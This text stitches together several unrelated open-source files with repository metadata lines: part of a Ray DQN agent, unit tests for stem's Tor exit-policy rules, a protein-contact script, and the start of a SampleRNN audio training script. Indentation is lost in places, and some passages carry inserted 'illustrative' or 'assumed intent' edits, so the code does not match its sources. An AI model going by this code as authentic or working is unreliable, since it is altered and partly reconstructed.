timesteps_per_iteration=1000,
buffer_size=50000,
exploration_fraction=0.1,
exploration_final_eps=0.02,
sample_batch_size=1,
num_workers=1,
train_batch_size=32,
print_freq=1,
learning_starts=1000,
gamma=1.0,
grad_norm_clipping=10,
target_network_update_freq=500,
prioritized_replay=False,
prioritized_replay_alpha=0.6,
prioritized_replay_beta0=0.4,
prioritized_replay_beta_iters=None,
prioritized_replay_eps=1e-6,
num_cpu=16)
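# Illustrative example (added, not part of the original module): the config is
# a plain dict, so a variant is typically built by overriding a few of the
# defaults; the name EXAMPLE_CONFIG and the override values are arbitrary.
EXAMPLE_CONFIG = dict(
    DEFAULT_CONFIG,
    lr=1e-4,
    num_workers=4,
    dueling=False)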
class Actor(object):
def __init__(self, env_creator, config, logdir):
env = env_creator()
env = wrap_dqn(env, config["model"])
self.env = env
self.config = config
num_cpu = config["num_cpu"]
tf_config = tf.ConfigProto(
inter_op_parallelism_threads=num_cpu,
intra_op_parallelism_threads=num_cpu)
self.sess = tf.Session(config=tf_config)
self.dqn_graph = models.DQNGraph(env, config)
# Create the replay buffer
if config["prioritized_replay"]:
self.replay_buffer = PrioritizedReplayBuffer(
config["buffer_size"],
alpha=config["prioritized_replay_alpha"])
prioritized_replay_beta_iters = \
config["prioritized_replay_beta_iters"]
if prioritized_replay_beta_iters is None:
prioritized_replay_beta_iters = \
config["schedule_max_timesteps"]
self.beta_schedule = LinearSchedule(
prioritized_replay_beta_iters,
initial_p=config["prioritized_replay_beta0"],
final_p=1.0)
else:
self.replay_buffer = ReplayBuffer(config["buffer_size"])
self.beta_schedule = None
# Create the schedule for exploration starting from 1.
self.exploration = LinearSchedule(
schedule_timesteps=int(
config["exploration_fraction"] *
config["schedule_max_timesteps"]),
initial_p=1.0,
final_p=config["exploration_final_eps"])
# Initialize the parameters and copy them to the target network.
self.sess.run(tf.global_variables_initializer())
self.dqn_graph.update_target(self.sess)
self.variables = ray.experimental.TensorFlowVariables(
tf.group(self.dqn_graph.q_tp1, self.dqn_graph.q_t), self.sess)
self.episode_rewards = [0.0]
self.episode_lengths = [0.0]
self.saved_mean_reward = None
self.obs = self.env.reset()
self.file_writer = tf.summary.FileWriter(logdir, self.sess.graph)
def step(self, cur_timestep):
# Take action and update exploration to the newest value
action = self.dqn_graph.act(
self.sess, np.array(self.obs)[None],
self.exploration.value(cur_timestep))[0]
new_obs, rew, done, _ = self.env.step(action)
ret = (self.obs, action, rew, new_obs, float(done))
self.obs = new_obs
self.episode_rewards[-1] += rew
self.episode_lengths[-1] += 1
if done:
self.obs = self.env.reset()
self.episode_rewards.append(0.0)
self.episode_lengths.append(0.0)
return ret
def do_steps(self, num_steps, cur_timestep):
for _ in range(num_steps):
obs, action, rew, new_obs, done = self.step(cur_timestep)
self.replay_buffer.add(obs, action, rew, new_obs, done)
def get_gradient(self, cur_timestep):
if self.config["prioritized_replay"]:
experience = self.replay_buffer.sample(
self.config["train_batch_size"],
beta=self.beta_schedule.value(cur_timestep))
(obses_t, actions, rewards, obses_tp1,
dones, _, batch_idxes) = experience
else:
obses_t, actions, rewards, obses_tp1, dones = \
self.replay_buffer.sample(self.config["train_batch_size"])
batch_idxes = None
td_errors, grad = self.dqn_graph.compute_gradients(
self.sess, obses_t, actions, rewards, obses_tp1, dones,
np.ones_like(rewards))
if self.config["prioritized_replay"]:
new_priorities = (
np.abs(td_errors) + self.config["prioritized_replay_eps"])
self.replay_buffer.update_priorities(
batch_idxes, new_priorities)
return grad
def apply_gradients(self, grad):
self.dqn_graph.apply_gradients(self.sess, grad)
def stats(self, num_timesteps):
mean_100ep_reward = round(np.mean(self.episode_rewards[-101:-1]), 1)
mean_100ep_length = round(np.mean(self.episode_lengths[-101:-1]), 1)
exploration = self.exploration.value(num_timesteps)
return (
mean_100ep_reward,
mean_100ep_length,
len(self.episode_rewards),
exploration,
len(self.replay_buffer))
def get_weights(self):
return self.variables.get_weights()
def set_weights(self, weights):
self.variables.set_weights(weights)
def save(self):
return [
self.beta_schedule,
self.exploration,
self.episode_rewards,
self.episode_lengths,
self.saved_mean_reward,
self.obs,
self.replay_buffer]
def restore(self, data):
self.beta_schedule = data[0]
self.exploration = data[1]
self.episode_rewards = data[2]
self.episode_lengths = data[3]
self.saved_mean_reward = data[4]
self.obs = data[5]
self.replay_buffer = data[6]
@ray.remote
class RemoteActor(Actor):
def __init__(self, env_creator, config, logdir, gpu_mask):
os.environ["CUDA_VISIBLE_DEVICES"] = gpu_mask
Actor.__init__(self, env_creator, config, logdir)
class DQNAgent(Agent):
_agent_name = "DQN"
_default_config = DEFAULT_CONFIG
def _init(self):
self.actor = Actor(self.env_creator, self.config, self.logdir)
self.workers = [
RemoteActor.remote(
self.env_creator, self.config, self.logdir,
"{}".format(i + self.config["gpu_offset"]))
for i in range(self.config["num_workers"])]
self.cur_timestep = 0
self.num_iterations = 0
self.num_target_updates = 0
self.steps_since_update = 0
self.file_writer = tf.summary.FileWriter(
self.logdir, self.actor.sess.graph)
self.saver = tf.train.Saver(max_to_keep=None)
def _update_worker_weights(self):
        weights = ray.put(self.actor.get_weights())
for w in self.workers:
w.set_weights.remote(weights)
def _train(self):
config = self.config
sample_time, sync_time, learn_time, apply_time = 0, 0, 0, 0
iter_init_timesteps = self.cur_timestep
num_loop_iters = 0
steps_per_iter = config["sample_batch_size"] * len(self.workers)
while (self.cur_timestep - iter_init_timesteps <
config["timesteps_per_iteration"]):
dt = time.time()
ray.get([
w.do_steps.remote(
config["sample_batch_size"], self.cur_timestep)
for w in self.workers])
num_loop_iters += 1
self.cur_timestep += steps_per_iter
self.steps_since_update += steps_per_iter
sample_time += time.time() - dt
if self.cur_timestep > config["learning_starts"]:
dt = time.time()
# Minimize the error in Bellman's equation on a batch sampled
# from replay buffer.
self._update_worker_weights()
sync_time += (time.time() - dt)
dt = time.time()
gradients = ray.get(
[w.get_gradient.remote(self.cur_timestep)
for w in self.workers])
learn_time += (time.time() - dt)
dt = time.time()
for grad in gradients:
self.actor.apply_gradients(grad)
apply_time += (time.time() - dt)
if (self.cur_timestep > config["learning_starts"] and
self.steps_since_update >
config["target_network_update_freq"]):
self.actor.dqn_graph.update_target(self.actor.sess)
# Update target network periodically.
self._update_worker_weights()
self.steps_since_update -= config["target_network_update_freq"]
self.num_target_updates += 1
mean_100ep_reward = 0.0
mean_100ep_length = 0.0
num_episodes = 0
buffer_size_sum = 0
for mean_rew, mean_len, episodes, exploration, buf_sz in ray.get(
[w.stats.remote(self.cur_timestep) for w in self.workers]):
mean_100ep_reward += mean_rew
mean_100ep_length += mean_len
num_episodes += episodes
buffer_size_sum += buf_sz
mean_100ep_reward /= len(self.workers)
mean_100ep_length /= len(self.workers)
info = [
("mean_100ep_reward", mean_100ep_reward),
("exploration_frac", exploration),
("steps", self.cur_timestep),
("episodes", num_episodes),
("buffer_sizes_sum", buffer_size_sum),
("target_updates", self.num_target_updates),
("sample_time", sample_time),
("weight_sync_time", sync_time),
("apply_time", apply_time),
("learn_time", learn_time),
("samples_per_s",
num_loop_iters * np.float64(steps_per_iter) / sample_time),
("learn_samples_per_s",
num_loop_iters * np.float64(config["train_batch_size"]) *
np.float64(config["num_workers"]) / learn_time),
]
for k, v in info:
logger.record_tabular(k, v)
logger.dump_tabular()
result = TrainingResult(
episode_reward_mean=mean_100ep_reward,
episode_len_mean=mean_100ep_length,
timesteps_this_iter=self.cur_timestep - iter_init_timesteps,
info=info)
return result
def _save(self):
checkpoint_path = self.saver.save(
self.actor.sess,
os.path.join(self.logdir, "checkpoint"),
global_step=self.num_iterations)
extra_data = [
self.actor.save(),
ray.get([w.save.remote() for w in self.workers]),
self.cur_timestep,
self.num_iterations,
self.num_target_updates,
self.steps_since_update]
pickle.dump(extra_data, open(checkpoint_path + ".extra_data", "wb"))
return checkpoint_path
def _restore(self, checkpoint_path):
self.saver.restore(self.actor.sess, checkpoint_path)
extra_data = pickle.load(open(checkpoint_path + ".extra_data", "rb"))
self.actor.restore(extra_data[0])
ray.get([
w.restore.remote(d) for (d, w)
in zip(extra_data[1], self.workers)])
self.cur_timestep = extra_data[2]
self.num_iterations = extra_data[3]
self.num_target_updates = extra_data[4]
self.steps_since_update = extra_data[5]
def compute_action(self, observation):
return self.actor.dqn_graph.act(
self.actor.sess, np.array(observation)[None], 0.0)[0]
| apache-2.0 | -416,873,251,771,667,650 | 36.423377 | 79 | 0.595364 | false |
eoinof/stem | test/unit/exit_policy/rule.py | 1 | 10901 | """
Unit tests for the stem.exit_policy.ExitPolicyRule class.
"""
import unittest
from stem.exit_policy import AddressType, ExitPolicyRule
class TestExitPolicyRule(unittest.TestCase):
def test_accept_or_reject(self):
self.assertTrue(ExitPolicyRule("accept *:*").is_accept)
self.assertFalse(ExitPolicyRule("reject *:*").is_accept)
invalid_inputs = (
"accept",
"reject",
"accept *:*",
"accept\t*:*",
"accept\n*:*",
"acceptt *:*",
"rejectt *:*",
"blarg *:*",
" *:*",
"*:*",
"",
)
for rule_arg in invalid_inputs:
self.assertRaises(ValueError, ExitPolicyRule, rule_arg)
def test_str_unchanged(self):
# provides a series of test inputs where the str() representation should
# match the input rule
test_inputs = (
"accept *:*",
"reject *:*",
"accept *:80",
"accept *:80-443",
"accept 127.0.0.1:80",
"accept 87.0.0.1/24:80",
"accept 156.5.38.3/255.255.0.255:80",
"accept [FFFF:FFFF:FFFF:FFFF:FFFF:FFFF:FFFF:FFFF]:80",
"accept [FFFF:FFFF:FFFF:FFFF:FFFF:FFFF:FFFF:FFFF]/32:80",
)
for rule_arg in test_inputs:
rule = ExitPolicyRule(rule_arg)
self.assertEquals(rule_arg, rule.rule)
self.assertEquals(rule_arg, str(rule))
def test_str_changed(self):
# some instances where our rule is valid but won't match our str() representation
test_inputs = {
"accept 10.0.0.1/32:80": "accept 10.0.0.1:80",
"accept 192.168.0.1/255.255.255.0:80": "accept 192.168.0.1/24:80",
"accept [::]/32:*": "accept [0000:0000:0000:0000:0000:0000:0000:0000]/32:*",
"accept [::]/128:*": "accept [0000:0000:0000:0000:0000:0000:0000:0000]:*",
}
for rule_arg, expected_str in test_inputs.items():
rule = ExitPolicyRule(rule_arg)
self.assertEquals(rule_arg, rule.rule)
self.assertEquals(expected_str, str(rule))
def test_valid_wildcard(self):
test_inputs = {
"reject *:*": (True, True),
"reject *:80": (True, False),
"accept 192.168.0.1:*": (False, True),
"accept 192.168.0.1:80": (False, False),
"reject 127.0.0.1/0:*": (False, True),
"reject 127.0.0.1/16:*": (False, True),
"reject 127.0.0.1/32:*": (False, True),
"reject [0000:0000:0000:0000:0000:0000:0000:0000]/0:80": (False, False),
"reject [0000:0000:0000:0000:0000:0000:0000:0000]/64:80": (False, False),
"reject [0000:0000:0000:0000:0000:0000:0000:0000]/128:80": (False, False),
"accept 192.168.0.1:0-65535": (False, True),
"accept 192.168.0.1:1-65535": (False, True),
"accept 192.168.0.1:2-65535": (False, False),
"accept 192.168.0.1:1-65534": (False, False),
}
for rule_arg, attr in test_inputs.items():
is_address_wildcard, is_port_wildcard = attr
rule = ExitPolicyRule(rule_arg)
self.assertEquals(is_address_wildcard, rule.is_address_wildcard())
self.assertEquals(is_port_wildcard, rule.is_port_wildcard())
def test_invalid_wildcard(self):
test_inputs = (
"reject */16:*",
"reject 127.0.0.1/*:*",
"reject *:0-*",
"reject *:*-15",
)
for rule_arg in test_inputs:
self.assertRaises(ValueError, ExitPolicyRule, rule_arg)
def test_wildcard_attributes(self):
rule = ExitPolicyRule("reject *:*")
self.assertEquals(AddressType.WILDCARD, rule.address_type)
self.assertEquals(None, rule.address)
self.assertEquals(None, rule.mask)
self.assertEquals(None, rule.masked_bits)
self.assertEquals(1, rule.min_port)
self.assertEquals(65535, rule.max_port)
def test_valid_ipv4_addresses(self):
test_inputs = {
"0.0.0.0": ("0.0.0.0", "255.255.255.255", 32),
"127.0.0.1/32": ("127.0.0.1", "255.255.255.255", 32),
"192.168.0.50/24": ("192.168.0.50", "255.255.255.0", 24),
"255.255.255.255/0": ("255.255.255.255", "0.0.0.0", 0),
}
for rule_addr, attr in test_inputs.items():
address, mask, masked_bits = attr
rule = ExitPolicyRule("accept %s:*" % rule_addr)
self.assertEquals(AddressType.IPv4, rule.address_type)
self.assertEquals(address, rule.address)
self.assertEquals(mask, rule.mask)
self.assertEquals(masked_bits, rule.masked_bits)
def test_invalid_ipv4_addresses(self):
test_inputs = (
"256.0.0.0",
"-1.0.0.0",
"0.0.0",
"0.0.0.",
"0.0.0.a",
"127.0.0.1/-1",
"127.0.0.1/33",
)
for rule_addr in test_inputs:
self.assertRaises(ValueError, ExitPolicyRule, "accept %s:*" % rule_addr)
def test_valid_ipv6_addresses(self):
test_inputs = {
"[fe80:0000:0000:0000:0202:b3ff:fe1e:8329]":
("FE80:0000:0000:0000:0202:B3FF:FE1E:8329",
"FFFF:FFFF:FFFF:FFFF:FFFF:FFFF:FFFF:FFFF", 128),
"[FE80::0202:b3ff:fe1e:8329]":
("FE80:0000:0000:0000:0202:B3FF:FE1E:8329",
"FFFF:FFFF:FFFF:FFFF:FFFF:FFFF:FFFF:FFFF", 128),
"[0000:0000:0000:0000:0000:0000:0000:0000]/0":
("0000:0000:0000:0000:0000:0000:0000:0000",
"0000:0000:0000:0000:0000:0000:0000:0000", 0),
"[::]":
("0000:0000:0000:0000:0000:0000:0000:0000",
"FFFF:FFFF:FFFF:FFFF:FFFF:FFFF:FFFF:FFFF", 128),
}
for rule_addr, attr in test_inputs.items():
address, mask, masked_bits = attr
rule = ExitPolicyRule("accept %s:*" % rule_addr)
self.assertEquals(AddressType.IPv6, rule.address_type)
self.assertEquals(address, rule.address)
self.assertEquals(mask, rule.mask)
self.assertEquals(masked_bits, rule.masked_bits)
def test_invalid_ipv6_addresses(self):
test_inputs = (
"fe80::0202:b3ff:fe1e:8329",
"[fe80::0202:b3ff:fe1e:8329",
"fe80::0202:b3ff:fe1e:8329]",
"[fe80::0202:b3ff:fe1e:832g]",
"[fe80:::b3ff:fe1e:8329]",
"[fe80::b3ff::fe1e:8329]",
"[fe80::0202:b3ff:fe1e:8329]/-1",
"[fe80::0202:b3ff:fe1e:8329]/129",
)
for rule_addr in test_inputs:
self.assertRaises(ValueError, ExitPolicyRule, "accept %s:*" % rule_addr)
def test_valid_ports(self):
test_inputs = {
"0": (0, 0),
"1": (1, 1),
"80": (80, 80),
"80-443": (80, 443),
}
for rule_port, attr in test_inputs.items():
min_port, max_port = attr
rule = ExitPolicyRule("accept 127.0.0.1:%s" % rule_port)
self.assertEquals(min_port, rule.min_port)
self.assertEquals(max_port, rule.max_port)
def test_invalid_ports(self):
test_inputs = (
"65536",
"a",
"5-3",
"5-",
"-3",
)
for rule_port in test_inputs:
self.assertRaises(ValueError, ExitPolicyRule, "accept 127.0.0.1:%s" % rule_port)
def test_is_match_wildcard(self):
test_inputs = {
"reject *:*": {
("192.168.0.1", 80): True,
("0.0.0.0", 80): True,
("255.255.255.255", 80): True,
("FE80:0000:0000:0000:0202:B3FF:FE1E:8329", 80): True,
("[FE80:0000:0000:0000:0202:B3FF:FE1E:8329]", 80): True,
("192.168.0.1", None): True,
(None, 80): True,
(None, None): True,
},
"reject 255.255.255.255/0:*": {
("192.168.0.1", 80): True,
("0.0.0.0", 80): True,
("255.255.255.255", 80): True,
("FE80:0000:0000:0000:0202:B3FF:FE1E:8329", 80): False,
("[FE80:0000:0000:0000:0202:B3FF:FE1E:8329]", 80): False,
("192.168.0.1", None): True,
(None, 80): False,
(None, None): False,
},
}
for rule_arg, matches in test_inputs.items():
rule = ExitPolicyRule(rule_arg)
for match_args, expected_result in matches.items():
self.assertEquals(expected_result, rule.is_match(*match_args))
# port zero is special in that exit policies can include it, but it's not
# something that we can match against
rule = ExitPolicyRule("reject *:*")
self.assertRaises(ValueError, rule.is_match, "127.0.0.1", 0)
def test_is_match_ipv4(self):
test_inputs = {
"reject 192.168.0.50:*": {
("192.168.0.50", 80): True,
("192.168.0.51", 80): False,
("192.168.0.49", 80): False,
(None, 80): False,
("192.168.0.50", None): True,
},
"reject 0.0.0.0/24:*": {
("0.0.0.0", 80): True,
("0.0.0.1", 80): True,
("0.0.0.255", 80): True,
("0.0.1.0", 80): False,
("0.1.0.0", 80): False,
("1.0.0.0", 80): False,
(None, 80): False,
("0.0.0.0", None): True,
},
}
for rule_arg, matches in test_inputs.items():
rule = ExitPolicyRule(rule_arg)
for match_args, expected_result in matches.items():
self.assertEquals(expected_result, rule.is_match(*match_args))
def test_is_match_ipv6(self):
test_inputs = {
"reject [FE80:0000:0000:0000:0202:B3FF:FE1E:8329]:*": {
("FE80:0000:0000:0000:0202:B3FF:FE1E:8329", 80): True,
("fe80:0000:0000:0000:0202:b3ff:fe1e:8329", 80): True,
("[FE80:0000:0000:0000:0202:B3FF:FE1E:8329]", 80): True,
("FE80:0000:0000:0000:0202:B3FF:FE1E:8330", 80): False,
("FE80:0000:0000:0000:0202:B3FF:FE1E:8328", 80): False,
(None, 80): False,
("FE80:0000:0000:0000:0202:B3FF:FE1E:8329", None): True,
},
"reject [FE80:0000:0000:0000:0202:B3FF:FE1E:8329]/112:*": {
("FE80:0000:0000:0000:0202:B3FF:FE1E:8329", 80): True,
("FE80:0000:0000:0000:0202:B3FF:FE1E:0000", 80): True,
("FE80:0000:0000:0000:0202:B3FF:FE1E:FFFF", 80): True,
("FE80:0000:0000:0000:0202:B3FF:FE1F:8329", 80): False,
("FE81:0000:0000:0000:0202:B3FF:FE1E:8329", 80): False,
(None, 80): False,
("FE80:0000:0000:0000:0202:B3FF:FE1E:8329", None): True,
},
}
for rule_arg, matches in test_inputs.items():
rule = ExitPolicyRule(rule_arg)
for match_args, expected_result in matches.items():
self.assertEquals(expected_result, rule.is_match(*match_args))
def test_is_match_port(self):
test_inputs = {
"reject *:80": {
("192.168.0.50", 80): True,
("192.168.0.50", 81): False,
("192.168.0.50", 79): False,
(None, 80): True,
("192.168.0.50", None): False,
},
"reject *:80-85": {
("192.168.0.50", 79): False,
("192.168.0.50", 80): True,
("192.168.0.50", 83): True,
("192.168.0.50", 85): True,
("192.168.0.50", 86): False,
(None, 83): True,
("192.168.0.50", None): False,
},
}
for rule_arg, matches in test_inputs.items():
rule = ExitPolicyRule(rule_arg)
for match_args, expected_result in matches.items():
self.assertEquals(expected_result, rule.is_match(*match_args))
| lgpl-3.0 | 8,623,108,772,148,325,000 | 32.336391 | 86 | 0.566278 | false |
mskwark/PconsC3 | extra/arne/MSA/find-intradom.py | 1 | 1381 | #!/usr/bin/env python
# Find all contacts between domains.
import sys, os, re, string
import argparse
from os.path import expanduser
home = expanduser("~")
sys.path.append(home + '/bioinfo-toolbox/parsing')
sys.path.append(home + '/git/bioinfo-toolbox/parsing')
import parse_contacts
import numpy as np
import matplotlib
matplotlib.use('Agg')
def find_domain_contacts(c_filename, start, end, domain, sep=5):
    # Parse the contact map and report the contacts that cross the given
    # domain boundary within the requested residue range.
    contacts = parse_contacts.parse(open(c_filename, 'r'), sep)
    contacts_np = parse_contacts.get_numpy_cmap(contacts)
    if end < 0:
        # default: take full sequence range into account
        end = contacts_np.shape[0]
    contacts_np = contacts_np[start:end, start:end]
    for i in range(len(contacts)):
        score = contacts[i][0]
        c_x = contacts[i][1] - 1
        c_y = contacts[i][2] - 1
        # only look at contacts within given range
        if c_x < start or c_x >= end:
            continue
        if c_y < start or c_y >= end:
            continue
        # skip contacts that are too close in sequence
        # (the original, incomplete script computed this but never used it)
        pos_diff = abs(c_x - c_y)
        too_close = pos_diff < sep
        if too_close:
            continue
        # assumed intent of the truncated `if c_x < domain` line: keep only
        # contacts that bridge the domain boundary
        if c_x < domain <= c_y:
            yield score, c_x + 1, c_y + 1
if __name__ == "__main__":
    p = argparse.ArgumentParser(description='Plot protein residue contact maps.')
    p.add_argument('contact_file', help='contact map file (assumed positional argument)')
    p.add_argument('-t', '--threshold', default=-1, type=float)
    p.add_argument('--start', default=0, type=int)
    p.add_argument('--end', default=-1, type=int)
    p.add_argument('--sep', default=5, type=int)
    p.add_argument('--domain', default=-1, type=int)
    args = p.parse_args()
    for score, res_i, res_j in find_domain_contacts(
            args.contact_file, args.start, args.end, args.domain, args.sep):
        print score, res_i, res_j
| gpl-2.0 | -7,908,435,588,187,494,000 | 26.078431 | 81 | 0.631427 | false |
soroushmehr/sampleRNN_ICLR2017 | models/three_tier/three_tier.py | 1 | 35718 | """
RNN Audio Generation Model
Three-tier model, Quantized input
For more info:
$ python three_tier.py -h
How-to-run example:
sampleRNN$ pwd
/u/mehris/sampleRNN
sampleRNN$ \
THEANO_FLAGS=mode=FAST_RUN,device=gpu,floatX=float32 python -u \
models/three_tier/three_tier.py --exp AXIS1 --seq_len 512 --big_frame_size 8 \
--frame_size 2 --weight_norm True --emb_size 64 --skip_conn False --dim 32 \
--n_rnn 2 --rnn_type LSTM --learn_h0 False --q_levels 16 --q_type linear \
--batch_size 128 --which_set MUSIC
To resume add ` --resume` to the END of the EXACTLY above line. You can run the
resume code as many time as possible, depending on the TRAIN_MODE.
(folder name, file name, flags, their order, and the values are important)
"""
from time import time
from datetime import datetime
print "Experiment started at:", datetime.strftime(datetime.now(), '%Y-%m-%d %H:%M')
exp_start = time()
import os, sys, glob
sys.path.insert(1, os.getcwd())
import argparse
import itertools
import numpy
numpy.random.seed(123)
np = numpy
import random
random.seed(123)
import theano
import theano.tensor as T
import theano.ifelse
import lasagne
import scipy.io.wavfile
import lib
LEARNING_RATE = 0.001
### Parsing passed args/hyperparameters ###
def get_args():
def t_or_f(arg):
ua = str(arg).upper()
if 'TRUE'.startswith(ua):
return True
elif 'FALSE'.startswith(ua):
return False
else:
raise ValueError('Arg is neither `True` nor `False`')
def check_non_negative(value):
ivalue = int(value)
if ivalue < 0:
raise argparse.ArgumentTypeError("%s is not non-negative!" % value)
return ivalue
def check_positive(value):
ivalue = int(value)
if ivalue < 1:
raise argparse.ArgumentTypeError("%s is not positive!" % value)
return ivalue
def check_unit_interval(value):
fvalue = float(value)
if fvalue < 0 or fvalue > 1:
raise argparse.ArgumentTypeError("%s is not in [0, 1] interval!" % value)
return fvalue
# No default value here. Indicate every single arguement.
parser = argparse.ArgumentParser(
description='three_tier.py\nNo default value! Indicate every argument.')
# TODO: Fix the descriptions
# Hyperparameter arguements:
parser.add_argument('--exp', help='Experiment name',
type=str, required=False, default='_')
parser.add_argument('--seq_len', help='How many samples to include in each\
Truncated BPTT pass', type=check_positive, required=True)
parser.add_argument('--big_frame_size', help='How many samples per big frame',\
type=check_positive, required=True)
parser.add_argument('--frame_size', help='How many samples per frame',\
type=check_positive, required=True)
parser.add_argument('--weight_norm', help='Adding learnable weight normalization\
to all the linear layers (except for the embedding layer)',\
type=t_or_f, required=True)
parser.add_argument('--emb_size', help='Size of embedding layer (> 0)',
type=check_positive, required=True) # different than two_tier
parser.add_argument('--skip_conn', help='Add skip connections to RNN',
type=t_or_f, required=True)
parser.add_argument('--dim', help='Dimension of RNN and MLPs',\
type=check_positive, required=True)
parser.add_argument('--n_rnn', help='Number of layers in the stacked RNN',
type=check_positive, choices=xrange(1,6), required=True)
parser.add_argument('--rnn_type', help='GRU or LSTM', choices=['LSTM', 'GRU'],\
required=True)
parser.add_argument('--learn_h0', help='Whether to learn the initial state of RNN',\
type=t_or_f, required=True)
parser.add_argument('--q_levels', help='Number of bins for quantization of\
audio samples. Should be 256 for mu-law.',\
type=check_positive, required=True)
parser.add_argument('--q_type', help='Quantization in linear-scale, a-law-companding,\
or mu-law compandig. With mu-/a-law quantization level shoud be set as 256',\
choices=['linear', 'a-law', 'mu-law'], required=True)
parser.add_argument('--which_set', help='ONOM, BLIZZ, MUSIC, or HUCK',
choices=['ONOM', 'BLIZZ', 'MUSIC', 'HUCK'], required=True)
parser.add_argument('--batch_size', help='size of mini-batch',
type=check_positive, choices=[64, 128, 256], required=True)
parser.add_argument('--debug', help='Debug mode', required=False, default=False, action='store_true')
parser.add_argument('--resume', help='Resume the same model from the last\
checkpoint. Order of params are important. [for now]',\
required=False, default=False, action='store_true')
args = parser.parse_args()
# NEW
# Create tag for this experiment based on passed args
tag = reduce(lambda a, b: a+b, sys.argv).replace('--resume', '').replace('/', '-').replace('--', '-').replace('True', 'T').replace('False', 'F')
tag += '-lr'+str(LEARNING_RATE)
print "Created experiment tag for these args:"
print tag
return args, tag
args, tag = get_args()
SEQ_LEN = args.seq_len # How many samples to include in each truncated BPTT pass
#print "------------------previous SEQ_LEN:", SEQ_LEN
# TODO: test incremental training
#SEQ_LEN = 512 + 256
#print "---------------------------new SEQ_LEN:", SEQ_LEN
BIG_FRAME_SIZE = args.big_frame_size # how many samples per big frame
FRAME_SIZE = args.frame_size # How many samples per frame
OVERLAP = BIG_FRAME_SIZE
WEIGHT_NORM = args.weight_norm
EMB_SIZE = args.emb_size
SKIP_CONN = args.skip_conn
DIM = args.dim # Model dimensionality.
BIG_DIM = DIM # Dimensionality for the slowest level.
N_RNN = args.n_rnn # How many RNNs to stack in the frame-level model
N_BIG_RNN = N_RNN # how many RNNs to stack in the big-frame-level model
RNN_TYPE = args.rnn_type
H0_MULT = 2 if RNN_TYPE == 'LSTM' else 1
LEARN_H0 = args.learn_h0
Q_LEVELS = args.q_levels # How many levels to use when discretizing samples. e.g. 256 = 8-bit scalar quantization
Q_TYPE = args.q_type # log- or linear-scale
WHICH_SET = args.which_set
BATCH_SIZE = args.batch_size
RESUME = args.resume
assert SEQ_LEN % BIG_FRAME_SIZE == 0,\
'seq_len should be divisible by big_frame_size'
assert BIG_FRAME_SIZE % FRAME_SIZE == 0,\
'big_frame_size should be divisible by frame_size'
N_FRAMES = SEQ_LEN / FRAME_SIZE # Number of frames in each truncated BPTT pass
if Q_TYPE == 'mu-law' and Q_LEVELS != 256:
raise ValueError('For mu-law Quantization levels should be exactly 256!')
# Fixed hyperparams
GRAD_CLIP = 1 # Elementwise grad clip threshold
BITRATE = 16000
# Other constants
#TRAIN_MODE = 'iters' # To use PRINT_ITERS and STOP_ITERS
TRAIN_MODE = 'time' # To use PRINT_TIME and STOP_TIME
#TRAIN_MODE = 'time-iters'
# To use PRINT_TIME for validation,
# and (STOP_ITERS, STOP_TIME), whichever happened first, for stopping exp.
#TRAIN_MODE = 'iters-time'
# To use PRINT_ITERS for validation,
# and (STOP_ITERS, STOP_TIME), whichever happened first, for stopping exp.
PRINT_ITERS = 10000 # Print cost, generate samples, save model checkpoint every N iterations.
STOP_ITERS = 100000 # Stop after this many iterations
PRINT_TIME = 90*60 # Print cost, generate samples, save model checkpoint every N seconds.
STOP_TIME = 60*60*24*3 # Stop after this many seconds of actual training (not including time req'd to generate samples etc.)
N_SEQS = 20 # Number of samples to generate every time monitoring.
RESULTS_DIR = 'results_3t'
FOLDER_PREFIX = os.path.join(RESULTS_DIR, tag)
Q_ZERO = numpy.int32(Q_LEVELS//2) # Discrete value corresponding to zero amplitude
epoch_str = 'epoch'
iter_str = 'iter'
lowest_valid_str = 'lowest valid cost'
corresp_test_str = 'corresponding test cost'
train_nll_str, valid_nll_str, test_nll_str = \
'train NLL (bits)', 'valid NLL (bits)', 'test NLL (bits)'
if args.debug:
import warnings
warnings.warn('----------RUNNING IN DEBUG MODE----------')
TRAIN_MODE = 'time'
PRINT_TIME = 100
STOP_TIME = 3000
STOP_ITERS = 1000
### Create directories ###
# FOLDER_PREFIX: root, contains:
# log.txt, __note.txt, train_log.pkl, train_log.png [, model_settings.txt]
# FOLDER_PREFIX/params: saves all checkpoint params as pkl
# FOLDER_PREFIX/samples: keeps all checkpoint samples as wav
# FOLDER_PREFIX/best: keeps the best parameters, samples, ...
if not os.path.exists(FOLDER_PREFIX):
os.makedirs(FOLDER_PREFIX)
PARAMS_PATH = os.path.join(FOLDER_PREFIX, 'params')
if not os.path.exists(PARAMS_PATH):
os.makedirs(PARAMS_PATH)
SAMPLES_PATH = os.path.join(FOLDER_PREFIX, 'samples')
if not os.path.exists(SAMPLES_PATH):
os.makedirs(SAMPLES_PATH)
BEST_PATH = os.path.join(FOLDER_PREFIX, 'best')
if not os.path.exists(BEST_PATH):
os.makedirs(BEST_PATH)
lib.print_model_settings(locals(), path=FOLDER_PREFIX, sys_arg=True)
### Import the data_feeder ###
# Handling WHICH_SET
if WHICH_SET == 'ONOM':
from datasets.dataset import onom_train_feed_epoch as train_feeder
from datasets.dataset import onom_valid_feed_epoch as valid_feeder
from datasets.dataset import onom_test_feed_epoch as test_feeder
elif WHICH_SET == 'BLIZZ':
from datasets.dataset import blizz_train_feed_epoch as train_feeder
from datasets.dataset import blizz_valid_feed_epoch as valid_feeder
from datasets.dataset import blizz_test_feed_epoch as test_feeder
elif WHICH_SET == 'MUSIC':
from datasets.dataset import music_train_feed_epoch as train_feeder
from datasets.dataset import music_valid_feed_epoch as valid_feeder
from datasets.dataset import music_test_feed_epoch as test_feeder
elif WHICH_SET == 'HUCK':
from datasets.dataset import huck_train_feed_epoch as train_feeder
from datasets.dataset import huck_valid_feed_epoch as valid_feeder
from datasets.dataset import huck_test_feed_epoch as test_feeder
def load_data(data_feeder):
"""
Helper function to deal with interface of different datasets.
`data_feeder` should be `train_feeder`, `valid_feeder`, or `test_feeder`.
"""
return data_feeder(BATCH_SIZE,
SEQ_LEN,
OVERLAP,
Q_LEVELS,
Q_ZERO,
Q_TYPE)
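# Illustrative sketch (comment only): every feeder returned by load_data yields
# minibatches of the form (sequences, reset_flag, mask), which is exactly how
# the training loop and monitor() below consume them, e.g.:
#
#   for seqs, reset, mask in load_data(train_feeder):
#       cost, big_h0, h0 = train_fn(seqs, big_h0, h0, reset, mask)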
### Creating computation graph ###
def big_frame_level_rnn(input_sequences, h0, reset):
"""
input_sequences.shape: (batch size, n big frames * BIG_FRAME_SIZE)
